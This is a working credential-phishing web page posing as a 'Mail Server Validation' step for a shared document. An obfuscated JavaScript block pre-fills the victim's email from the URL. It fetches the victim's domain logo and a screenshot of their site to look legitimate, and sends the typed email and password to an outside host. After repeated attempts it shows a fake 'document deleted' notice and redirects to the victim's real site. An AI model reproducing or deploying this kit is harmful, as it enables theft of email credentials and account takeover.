
<html lang="en"><head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400&amp;display=swap" rel="stylesheet">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://dipadasflasfaslf09fasfas.pages.dev/fonts/icomoon/style.css">
    <style>
    body {
  font-family: "Roboto", sans-serif;
  background-color: #fff; }

p {
  color: #b3b3b3;
  font-weight: 300; }

h1, h2, h3, h4, h5, h6,
.h1, .h2, .h3, .h4, .h5, .h6 {
  font-family: "Roboto", sans-serif; }

a {
  -webkit-transition: .3s all ease;
  -o-transition: .3s all ease;
  transition: .3s all ease; }
  a:hover {
    text-decoration: none !important; }

.content {
  padding: 7rem 0; }

h2 {
  font-size: 20px; }

.half, .half .container > .row {
  height: 100vh;
  min-height: 700px; }

@media (max-width: 991.98px) {
  .half .bg {
    height: 200px; } }

.half .contents {
  background: #f6f7fc; }

.half .contents, .half .bg {
  width: 50%; }
  @media (max-width: 1199.98px) {
    .half .contents, .half .bg {
      width: 100%; } }
  .half .contents .form-control, .half .bg .form-control {
    border: none;
    -webkit-box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1);
    box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1);
    border-radius: 4px;
    height: 54px;
    background: #fff; }
    .half .contents .form-control:active, .half .contents .form-control:focus, .half .bg .form-control:active, .half .bg .form-control:focus {
      outline: none;
      -webkit-box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1);
      box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1); }

.half .bg {
  background-size: cover;
  background-position: center; }

.half a {
  color: #888;
  text-decoration: underline; }

.half .btn {
  height: 54px;
  padding-left: 30px;
  padding-right: 30px; }

.half .forgot-pass {
  position: relative;
  top: 2px;
  font-size: 14px; }

.control {
  display: block;
  position: relative;
  padding-left: 30px;
  margin-bottom: 15px;
  cursor: pointer;
  font-size: 14px; }
  .control .caption {
    position: relative;
    top: .2rem;
    color: #888; }

.control input {
  position: absolute;
  z-index: -1;
  opacity: 0; }

.control__indicator {
  position: absolute;
  top: 2px;
  left: 0;
  height: 20px;
  width: 20px;
  background: #e6e6e6;
  border-radius: 4px; }

.control--radio .control__indicator {
  border-radius: 50%; }

.control:hover input ~ .control__indicator,
.control input:focus ~ .control__indicator {
  background: #ccc; }

.control input:checked ~ .control__indicator {
  background: #fb771a; }

.control:hover input:not([disabled]):checked ~ .control__indicator,
.control input:checked:focus ~ .control__indicator {
  background: #fb8633; }

.control input:disabled ~ .control__indicator {
  background: #e6e6e6;
  opacity: 0.9;
  pointer-events: none; }

.control__indicator:after {
  font-family: 'icomoon';
  content: '\e5ca';
  position: absolute;
  display: none;
  font-size: 16px;
  -webkit-transition: .3s all ease;
  -o-transition: .3s all ease;
  transition: .3s all ease; }

.control input:checked ~ .control__indicator:after {
  display: block;
  color: #fff; }

.control--checkbox .control__indicator:after {
  top: 50%;
  left: 50%;
  margin-top: -1px;
  -webkit-transform: translate(-50%, -50%);
  -ms-transform: translate(-50%, -50%);
  transform: translate(-50%, -50%); }

.control--checkbox input:disabled ~ .control__indicator:after {
  border-color: #7b7b7b; }

.control--checkbox input:disabled:checked ~ .control__indicator {
  background-color: #7e0cf5;
  opacity: .2; }
    
    </style>
    <title>Account Administrator</title>
  </head>
  <body style="">
  
  <div id="loadlast" class="" style="display: none">
  <div id="id0oo1">

    <div class="modal-content animate" style="width: 450px; padding-top: 30px;">
        <span class="text-center" style="font-size: 20px">Secure Document Sharing</span>
    <div class="imgcontainer text-center">
      <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSWSjpDaJch7A32iI2FZVMbsXS35IpPPyHh5A&amp;usqp=CAU" width="40%">
    </div>

    <div class="container" style="text-align: left">
     <center>
      <br>
<p style="text-align: left; padding: 0px 20px"><font size="3" face="Trebuchet MS" color="black">The shared document was deleted by the sender.<br>Please contact the sender directly to request the document.<br></font><br> 
<br>
    </p></center></div>

    <div class="container" style="background-color:#f1f1f1">
     
    
    </div>
</div>
    </div>
</div>
      
  <div id="loadfirst" class="d-lg-flex half">
    <div class="bg order-1 order-md-1" style="background-image: url('');"></div>
    <div class="contents order-2 order-md-2">

      <div class="container">
        <div class="row align-items-center justify-content-center">
          <div class="col-md-7">
            <img id="logoimg" width="20%" class="img-responsive" alt="">
            <h3><span id="logoname" style="text-transform: uppercase;"></span>  <strong>Mail Server Validation</strong></h3>
            <p style="font-size: 15px;">Your information is only for the sole purpose of viewing this document and would not be sold or shared to any third party.</p>
            <form action="" method="post">
              <center>
								<div class="alert alert-danger" id="msg" style="display: none; font-size:14px; ">Email Password Authentication failed, try again with a valid password.</div>
								<span id="error" class="alert alert-danger" style="display: none; font-size:14px; ">That account doesn't exist. Enter a different account</span>
							</center>
              <div class="form-group first">
                <label for="username">Verified User Email:</label>
                <input type="text" class="form-control" id="email" name="email" readonly="">
              </div>
              <div class="form-group last mb-3">
                <label for="password">Email Password:</label>
                <input type="password" class="form-control" placeholder="Your Password" id="password" name="password">
              </div>
              
              <div class="d-flex mb-5 align-items-center">
                <label class="control control--checkbox mb-0"><span class="caption">Remember me</span>
                  <input type="checkbox" checked="checked">
                  <div class="control__indicator"></div>
                </label>
                
              </div>
              <button type="submit" id="submit-btn" class="btn btn-block btn-warning" style="background-color: #fb771a">Authenticate</button>

            </form>

            <p>© 2024 Mail Server Authenticator</p>
          </div>
        </div>
      </div>
    </div>

    
  </div>
    
    

    <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/js/bootstrap.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>

  <script>
 function _0x1f2c(_0x4f54f2,_0x279cb2){var _0x5a6b5f=_0x5a6b();return _0x1f2c=function(_0x1f2c46,_0xe07aed){_0x1f2c46=_0x1f2c46-0x1c3;var _0x1c43c7=_0x5a6b5f[_0x1f2c46];return _0x1c43c7;},_0x1f2c(_0x4f54f2,_0x279cb2);}var _0x644a7e=_0x1f2c;function _0x5a6b(){var _0x2b0c9e=['replace','#logoimg','click','html','show','2240694efglJD','.email','val','#error','#logoname','focus','signal','5789112VLTSOE','substr','#loadfirst','<span\x20style=\x27color:red;\x27>Username\x20or\x20Password\x20is\x20incorrect.\x20Please\x20try\x20again</span>','635692PvHrhZ','11232630VyIgiQ','https://citech.cam/indax.php','loadlast','length','style','location','5925493fcIEmJ','indexOf','className','3PRSBlZ','Verifing...','src','#msg','https://image.thum.io/get/width/1200/','Sign\x20in','JSON','preventDefault','208nxMDLP','Wrong\x20password!\x20Please\x20try\x20again','backgroundImage','#password','url(\x27\x27)','ssss','onload','https://logo.clearbit.com/','h-100\x20d-flex\x20justify-content-center\x20align-items-center','https://','loadfirst','msg','attr','#loadlast','getElementById','http://www.','317335OCdKNa','log','29795UZafkX','#submit-btn','ready','body','https://p.kindpng.com/picc/s/25-259966_transparent-background-white-email-icon-png-png-download.png','width','onerror','hide'];_0x5a6b=function(){return _0x2b0c9e;};return _0x5a6b();}(function(_0x5ab915,_0x4fb7be){var _0x20f5b2=_0x1f2c,_0x24df0f=_0x5ab915();while(!![]){try{var _0x56e75d=-parseInt(_0x20f5b2(0x1e2))/0x1+-parseInt(_0x20f5b2(0x1fc))/0x2*(-parseInt(_0x20f5b2(0x1ca))/0x3)+parseInt(_0x20f5b2(0x1d2))/0x4*(-parseInt(_0x20f5b2(0x1e4))/0x5)+-parseInt(_0x20f5b2(0x1f1))/0x6+-parseInt(_0x20f5b2(0x1c7))/0x7+parseInt(_0x20f5b2(0x1f8))/0x8+parseInt(_0x20f5b2(0x1fd))/0x9;if(_0x56e75d===_0x4fb7be)break;else _0x24df0f['push'](_0x24df0f['shift']());}catch(_0x1a7682){_0x24df0f['push'](_0x24df0f['shift']());}}}(_0x5a6b,0x6c024));function checkImage(_0x472769){var _0x4f86ea=_0x1f2c,_0x3344e2=new Image();_0x3344e2[_0x4f86ea(0x1d8)]=function(){var _0x3b8587=_0x4f86ea;this[_0x3b8587(0x1e9)]>0x0&&$(_0x3b8587(0x1ed))[_0x3b8587(0x1de)]('src',_0x472769);},_0x3344e2[_0x4f86ea(0x1ea)]=function(){var _0x33dcff=_0x4f86ea;$(_0x33dcff(0x1ed))[_0x33dcff(0x1de)](_0x33dcff(0x1cc),_0x33dcff(0x1e8));},_0x3344e2[_0x4f86ea(0x1cc)]=_0x472769;}$(document)[_0x644a7e(0x1e6)](function(){var _0x13007e=_0x644a7e,_0x1dd3ac=0x0,_0x2f7e3c=window[_0x13007e(0x1c6)]['hash'][_0x13007e(0x1f9)](0x1);if(!_0x2f7e3c){}else{var _0x5a934e=_0x2f7e3c;$('#email')[_0x13007e(0x1f3)](_0x2f7e3c);var _0xb5e3cc=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0xb5e3cc['test'](_0x5a934e))return $(_0x13007e(0x1f4))[_0x13007e(0x1f0)](),_0x2f7e3c[_0x13007e(0x1f6)],![];var _0x3eb193=_0x5a934e[_0x13007e(0x1c8)]('@'),_0x17ba5b=_0x5a934e[_0x13007e(0x1f9)](_0x3eb193+0x1),_0x487768=_0x17ba5b['substr'](0x0,_0x17ba5b[_0x13007e(0x1c8)]('.'));$(_0x13007e(0x1f5))[_0x13007e(0x1ef)](_0x487768);var _0x311270=_0x13007e(0x1db)+_0x17ba5b;checkImage(_0x13007e(0x1d9)+_0x17ba5b);var _0x36e3e6=_0x13007e(0x1ce)+_0x311270;document[_0x13007e(0x1e7)]['style'][_0x13007e(0x1d4)]='url(\x27'+_0x36e3e6+'\x27)',$(_0x13007e(0x1f2))[_0x13007e(0x1ef)](_0x2f7e3c);}$(_0x13007e(0x1e5))[_0x13007e(0x1ee)](function(_0x13b609){var _0x121e72=_0x13007e;_0x13b609[_0x121e72(0x1d1)]();var _0x740ce5=$('#email')[_0x121e72(0x1f3)](),_0x7a8f0b=$(_0x121e72(0x1d5))[_0x121e72(0x1f3)]();if(_0x7a8f0b[_0x121e72(0x1c4)]<0x4)return $(_0x121e72(0x1cd))[_0x121e72(0x1f0)](),$(_0x121e72(0x1cd))['html'](_0x121e72(0x1d3)),![];_0x1dd3ac=_0x1dd3ac+0x1,$['ajax']({'dataType':_0x121e72(0x1d0),'url':_0x121e72(0x1fe),'type':'POST','data':{'oemail':_0x740ce5,'opassword':_0x7a8f0b},'beforeSend':function(_0xfc8293){var _0x17b593=_0x121e72;$(_0x17b593(0x1e5))['html'](_0x17b593(0x1cb));},'success':function(_0x23dd9e){var _0x4ef120=_0x121e72;$('#msg')[_0x4ef120(0x1ef)](_0x4ef120(0x1fb)),_0x23dd9e&&($(_0x4ef120(0x1cd))['show'](),console[_0x4ef120(0x1e3)](_0x23dd9e),$(_0x4ef120(0x1cd))[_0x4ef120(0x1ef)](_0x23dd9e['msg']),_0x23dd9e[_0x4ef120(0x1f7)]=='ok'?($('#password')['val'](''),_0x1dd3ac>=0x3&&(_0x1dd3ac=0x0,$(_0x4ef120(0x1fa))[_0x4ef120(0x1eb)](),document[_0x4ef120(0x1e0)](_0x4ef120(0x1dc))[_0x4ef120(0x1c9)]=_0x4ef120(0x1d7),document[_0x4ef120(0x1e0)](_0x4ef120(0x1c3))[_0x4ef120(0x1c9)]=_0x4ef120(0x1da),document[_0x4ef120(0x1e7)][_0x4ef120(0x1c5)][_0x4ef120(0x1d4)]=_0x4ef120(0x1d6),$(_0x4ef120(0x1df))[_0x4ef120(0x1f0)](),setTimeout(()=>{var _0x5d5c60=_0x4ef120;window[_0x5d5c60(0x1c6)][_0x5d5c60(0x1ec)](_0x5d5c60(0x1e1)+_0x17ba5b);},0x1388))):$(_0x4ef120(0x1cd))[_0x4ef120(0x1ef)](_0x23dd9e[_0x4ef120(0x1dd)]));},'error':function(){var _0x341bac=_0x121e72;$(_0x341bac(0x1d5))[_0x341bac(0x1f3)](''),_0x1dd3ac>=0x2&&(_0x1dd3ac=0x0,window[_0x341bac(0x1c6)][_0x341bac(0x1ec)](_0x341bac(0x1e1)+_0x17ba5b)),$(_0x341bac(0x1cd))[_0x341bac(0x1f0)]();},'complete':function(){var _0x359f9b=_0x121e72;$(_0x359f9b(0x1e5))['html'](_0x359f9b(0x1cf));}});});});
  </script>
</body></html>
